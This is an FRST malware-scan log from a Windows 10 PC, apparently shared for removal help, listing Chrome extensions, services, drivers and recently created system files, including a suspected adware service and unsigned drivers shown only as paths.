CHR Extension: (Website Logon) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\kanflfepiobnpjbljmngfgegijhdpljm [2014-07-07]
CHR Extension: (Google Wallet) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-07-07]
CHR Extension: (Gmail) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-07-07]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\Exts\Chrome.crx [2015-12-24]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [chgdeabpmphfhkoemjjglmilajldekbp] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRChromePlugin.crx [2015-07-09]
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\Exts\Chrome.crx [2015-12-24]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [kanflfepiobnpjbljmngfgegijhdpljm] - C:\Program Files (x86)\HP SimplePass\tschrome.crx [2013-04-01]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 EgisTec Service; C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisService.exe [689008 2010-03-25] (Egis Technology Inc. )
R2 Fitbit Connect; C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [5738528 2014-11-07] (Fitbit, Inc.) [File not signed]
R2 FPLService; C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe [1641768 2013-06-07] (HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [46904 2013-12-17] (Hewlett-Packard Company)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [330136 2015-10-30] (Intel Corporation)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [140456 2012-03-27] ()
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [128896 2012-07-17] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
R2 NS; C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\NS.exe [282016 2015-11-20] (Symantec Corporation)
R2 OhufgaFyfves; C:\Program Files\Phrase Professor191220150009\MolacAgafxi.exe [178536 2015-12-18] ()
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-07-17] (Synaptics Incorporated)
S3 TrueService; C:\Program Files\Common Files\AuthenTec\TrueService.exe [401856 2013-01-07] (AuthenTec, Inc.)
R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [28160 2012-09-06] () [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
S2 EraserSvc11511; "C:\Program Files (x86)\Norton Security\Engine\22.5.4.24\NS.exe" /h ccCommon [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\BASHDefs\20160213.003\BHDrvx64.sys [1665608 2015-10-08] (Symantec Corporation)
R1 bsdriver; C:\WINDOWS\system32\drivers\bsdriver.sys [34712 2015-12-18] ()
R1 ccSet_NS; C:\Windows\system32\drivers\NSx64\1605050.00F\ccSetx64.sys [173808 2015-09-23] (Symantec Corporation)
S1 cherimoya; C:\Windows\System32\drivers\cherimoya.sys [9264 2015-12-18] ()
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [498512 2015-12-23] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [157520 2015-12-23] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\IPSDefs\20160307.001\IDSvia64.sys [767224 2016-02-15] (Symantec Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\VirusDefs\20160308.006\ENG64.SYS [138488 2015-12-23] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\VirusDefs\20160308.006\EX64.SYS [2148080 2015-12-23] (Symantec Corporation)
R3 netr28x; C:\Windows\system32\DRIVERS\netr28x.sys [2554528 2015-06-12] (MediaTek Inc.)
S3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-05] (Realtek Semiconductor Corp.)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2015-10-30] (Realtek )
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-07-17] (Synaptics Incorporated)
R1 SRTSP; C:\Windows\System32\Drivers\NSx64\1605050.00F\SRTSP64.SYS [928496 2015-11-11] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NSx64\1605050.00F\SRTSPX64.SYS [50936 2015-09-23] (Symantec Corporation)
R0 SymEFASI; C:\Windows\System32\drivers\NSx64\1605050.00F\SYMEFASI64.SYS [1621232 2015-11-11] (Symantec Corporation)
S0 SymELAM; C:\Windows\System32\drivers\NSx64\1605050.00F\SymELAM.sys [24192 2015-09-23] (Symantec Corporation)
R3 SymEvent; C:\WINDOWS\system32\Drivers\SYMEVENT64x86.SYS [111344 2015-12-24] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NSx64\1605050.00F\Ironx64.SYS [297720 2015-09-23] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\NSx64\1605050.00F\SYMNETS.SYS [577768 2015-11-11] (Symantec Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-02-08] (Hewlett-Packard Development Company, L.P.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-08 17:33 - 2016-03-08 17:33 - 02374144 _____ (Farbar) C:\Users\levilaing\Downloads\FRST64.exe
2016-03-08 17:33 - 2016-03-08 17:33 - 00032606 _____ C:\Users\levilaing\Downloads\FRST.txt
2016-03-08 17:32 - 2016-03-08 17:32 - 01725440 _____ (Farbar) C:\Users\levilaing\Downloads\FRST.exe
2016-03-08 17:29 - 2016-03-08 17:32 - 00000253 _____ C:\Users\levilaing\Downloads\Search.txt
2016-03-08 17:16 - 2016-03-08 17:33 - 00000000 ____D C:\FRST
2016-03-08 16:37 - 2016-03-08 16:38 - 00041639 _____ C:\Users\levilaing\Downloads\Addition.txt
2016-03-01 13:31 - 2016-03-01 13:31 - 00000860 _____ C:\WINDOWS\system32\Drivers\etc\hosts.bak
2016-03-01 13:27 - 2016-03-01 13:27 - 00111288 _____ (Symantec Corporation) C:\WINDOWS\system32\Drivers\SMR501.SYS.bak
2016-03-01 13:26 - 2016-03-01 13:50 - 00000000 ____D C:\Users\levilaing\AppData\Local\NPE
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-03-01 12:58 - 2016-02-23 05:23 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-03-01 12:58 - 2016-02-23 05:22 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-03-01 12:58 - 2016-02-23 05:15 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-03-01 12:58 - 2016-02-23 04:32 - 08705672 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-03-01 12:58 - 2016-02-23 04:31 - 00408120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2016-03-01 12:58 - 2016-02-23 04:21 - 22564328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-03-01 12:58 - 2016-02-23 04:21 - 06606568 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-03-01 12:58 - 2016-02-23 03:45 - 02773096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2016-03-01 12:58 - 2016-02-23 03:45 - 01998176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-03-01 12:58 - 2016-02-23 03:45 - 00576352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-03-01 12:58 - 2016-02-23 03:38 - 06952088 _____ (Microsoft Corp.) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-03-01 12:58 - 2016-02-23 03:27 - 21124344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-03-01 12:58 - 2016-02-23 03:26 - 05241984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-03-01 12:58 - 2016-02-23 02:58 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-03-01 12:58 - 2016-02-23 02:29 - 00591872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2016-03-01 12:58 - 2016-02-23 02:28 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-03-01 12:58 - 2016-02-23 02:09 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-03-01 12:58 - 2016-02-23 02:00 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-03-01 12:58 - 2016-02-23 01:58 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-03-01 12:58 - 2016-02-23 01:30 - 01731584 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-03-01 12:58 - 2016-02-23 01:24 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-03-01 12:58 - 2016-02-23 00:52 - 11545600 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-03-01 12:58 - 2016-02-23 00:50 - 22396416 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-03-01 12:58 - 2016-02-23 00:50 - 09919488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-03-01 12:58 - 2016-02-23 00:40 - 24603136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-03-01 12:58 - 2016-02-23 00:39 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-03-01 12:58 - 2016-02-23 00:39 - 02581504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-03-01 12:58 - 2016-02-23 00:36 - 19341312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-03-01 12:58 - 2016-02-23 00:36 - 18680320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-03-01 12:58 - 2016-02-23 00:36 - 12125696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-03-01 12:58 - 2016-02-23 00:33 - 14254080 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-03-01 12:58 - 2016-02-08 21:24 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-03-01 12:58 - 2016-02-08 21:04 - 01946624 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-03-01 12:57 - 2016-02-23 05:29 - 01030416 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-03-01 12:57 - 2016-02-23 05:29 - 00874968 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-03-01 12:57 - 2016-02-23 05:27 - 07475040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-03-01 12:57 - 2016-02-23 05:27 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-03-01 12:57 - 2016-02-23 05:27 - 01141504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-03-01 12:57 - 2016-02-23 05:25 - 02152288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-03-01 12:57 - 2016-02-23 05:25 - 01818696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-03-01 12:57 - 2016-02-23 05:25 - 00563552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2016-03-01 12:57 - 2016-02-23 05:15 - 00779384 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskschd.dll
2016-03-01 12:57 - 2016-02-23 05:09 - 01614176 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-03-01 12:57 - 2016-02-23 05:08 - 00989536 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-03-01 12:57 - 2016-02-23 04:34 - 01859960 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-03-01 12:57 - 2016-02-23 04:34 - 01542816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-03-01 12:57 - 2016-02-23 04:33 - 00696160 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-03-01 12:57 - 2016-02-23 04:33 - 00389992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 02544264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 01152328 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 01062480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 00498448 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2016-03-01 12:57 - 2016-02-23 04:31 - 01017032 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00847656 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00819648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00536256 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00476728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2016-03-01 12:57 - 2016-02-23 04:25 - 03671888 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-03-01 12:57 - 2016-02-23 04:22 - 00572272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\taskschd.dll
2016-03-01 12:57 - 2016-02-23 04:17 - 00146272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
2016-03-01 12:57 - 2016-02-23 03:49 - 00216416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2016-03-01 12:57 - 2016-02-23 03:45 - 00394080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-03-01 12:57 - 2016-02-23 03:45 - 00259336 _____ (Microsoft Corporation) C:\WINDOWS\system32\sqmapi.dll
2016-03-01 12:57 - 2016-02-23 03:44 - 00640984 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-03-01 12:57 - 2016-02-23 03:44 - 00147808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2016-03-01 12:57 - 2016-02-23 03:40 - 00430944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-03-01 12:57 - 2016-02-23 03:39 - 00502112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 02180136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00980352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00895080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00882720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00709176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00450912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00420928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2016-03-01 12:57 - 2016-02-23 03:37 - 00713824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:32 - 00791744 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-03-01 12:57 - 2016-02-23 03:30 - 02919320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-03-01 12:57 - 2016-02-23 03:27 - 00376536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2016-03-01 12:57 - 2016-02-23 03:25 - 00534368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2016-03-01 12:57 - 2016-02-23 03:20 - 01139712 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSave.dll
2016-03-01 12:57 - 2016-02-23 03:20 - 00238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2016-03-01 12:57 - 2016-02-23 03:19 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-03-01 12:57 - 2016-02-23 03:17 - 00649216 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-03-01 12:57 - 2016-02-23 03:12 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\provpackageapidll.dll
2016-03-01 12:57 - 2016-02-23 03:10 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-03-01 12:57 - 2016-02-23 03:07 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-03-01 12:57 - 2016-02-23 03:07 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-03-01 12:57 - 2016-02-23 03:06 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\flvprophandler.dll
2016-03-01 12:57 - 2016-02-23 03:01 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasl2tp.sys
2016-03-01 12:57 - 2016-02-23 03:00 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2016-03-01 12:57 - 2016-02-23 03:00 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00187744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininetlui.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\irmon.dll
2016-03-01 12:57 - 2016-02-23 02:57 - 00199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-03-01 12:57 - 2016-02-23 02:56 - 02186864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2016-03-01 12:57 - 2016-02-23 02:55 - 00221600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sqmapi.dll
2016-03-01 12:57 - 2016-02-23 02:55 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2016-03-01 12:57 - 2016-02-23 02:54 - 00539256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-03-01 12:57 - 2016-02-23 02:54 - 00141664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2016-03-01 12:57 - 2016-02-23 02:53 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\srpapi.dll
2016-03-01 12:57 - 2016-02-23 02:53 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-03-01 12:57 - 2016-02-23 02:52 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2016-03-01 12:57 - 2016-02-23 02:50 - 00159232 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-03-01 12:57 - 2016-02-23 02:48 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-03-01 12:57 - 2016-02-23 02:48 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerClient.dll
2016-03-01 12:57 - 2016-02-23 02:40 - 00074240 _____ (Microsoft Corporation) C:\WINDOWS\system32\SMSRouter.dll
2016-03-01 12:57 - 2016-02-23 02:39 - 00178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2016-03-01 12:57 - 2016-02-23 02:38 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSFlacDecoder.dll
2016-03-01 12:57 - 2016-02-23 02:38 - 00287712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MediaControl.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-03-01 12:57 - 2016-02-23 02:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\QuickActionsDataModel.dll
2016-03-01 12:57 - 2016-02-23 02:34 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll
2016-03-01 12:57 - 2016-02-23 02:34 - 00189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2016-03-01 12:57 - 2016-02-23 02:33 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\system32\MBMediaManager.dll
2016-03-01 12:57 - 2016-02-23 02:32 - 00414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-03-01 12:57 - 2016-02-23 02:31 - 00463360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2016-03-01 12:57 - 2016-02-23 02:30 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultsvc.dll
2016-03-01 12:57 - 2016-02-23 02:28 - 00685568 _____ (Microsoft Corporation) C:\WINDOWS\system32\scapi.dll
2016-03-01 12:57 - 2016-02-23 02:27 - 00307712 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2016-03-01 12:57 - 2016-02-23 02:26 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDEServer.exe
2016-03-01 12:57 - 2016-02-23 02:25 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2016-03-01 12:57 - 2016-02-23 02:25 - 00229376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2016-03-01 12:57 - 2016-02-23 02:23 - 00412672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2016-03-01 12:57 - 2016-02-23 02:22 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-03-01 12:57 - 2016-02-23 02:22 - 00451584 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00847360 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00606720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00493568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmkvsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00330240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-01 12:57 - 2016-02-23 02:19 - 00948736 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-03-01 12:57 - 2016-02-23 02:19 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2016-03-01 12:57 - 2016-02-23 02:18 - 00557056 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-03-01 12:57 - 2016-02-23 02:14 - 00828928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2016-03-01 12:57 - 2016-02-23 02:14 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2016-03-01 12:57 - 2016-02-23 02:13 - 00915456 _____ (Microsoft Corporation) C:\WINDOWS\system32\configurationclient.dll
2016-03-01 12:57 - 2016-02-23 02:13 - 00286720 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-03-01 12:57 - 2016-02-23 02:12 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-03-01 12:57 - 2016-02-23 02:11 - 01224704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2016-03-01 12:57 - 2016-02-23 02:11 - 00587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-03-01 12:57 - 2016-02-23 02:10 - 00997376 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2016-03-01 12:57 - 2016-02-23 02:10 - 00474624 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-03-01 12:57 - 2016-02-23 02:09 - 01390592 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-03-01 12:57 - 2016-02-23 02:09 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-03-01 12:57 - 2016-02-23 02:09 - 00870400 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 01848832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-03-01 12:57 - 2016-02-23 02:06 - 01213440 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininetlui.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2016-03-01 12:57 - 2016-02-23 02:05 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
